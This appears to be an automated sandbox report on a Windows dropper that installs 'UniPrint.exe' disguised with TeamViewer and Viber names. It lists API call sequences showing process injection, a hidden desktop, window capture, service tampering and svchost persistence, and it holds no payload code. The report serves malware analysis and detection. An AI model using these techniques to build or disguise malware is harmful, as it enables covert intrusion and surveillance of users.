Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CA020 GetCurrentThreadId,GetThreadDesktop,StrChrW,CreateDesktopW,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040323C EntryPoint,7329E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404853
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00406131
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004A13AA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053E430
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004C97CD
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00534810
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_005438ED
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00544B6A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_00546FFB
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029AF876
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 12_2_027ED77A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040F6FE appears 62 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCB5 appears 419 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053E5C8 appears 32 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0040DFA6 appears 31 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 004A1B0C appears 235 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: String function: 0053BCE8 appears 61 times
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C3760 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,StrChrW,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C26E0 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CA880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C1960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C27F0 GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5CB1A0 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB570 NtSuspendThread,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C7D00 PostThreadMessageW,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageW,CreateThread,CallWindowProcW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB5F0 NtResumeThread,NtClose,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C7240 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C26E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C27F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CA880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB1A0 NtOpenThread,
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: No import functions for PE file found
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeSection loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C3850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: wogZe27GBB.exeVirustotal: Detection: 53%
Source: wogZe27GBB.exeReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\user\Desktop\wogZe27GBB.exe
Source: wogZe27GBB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
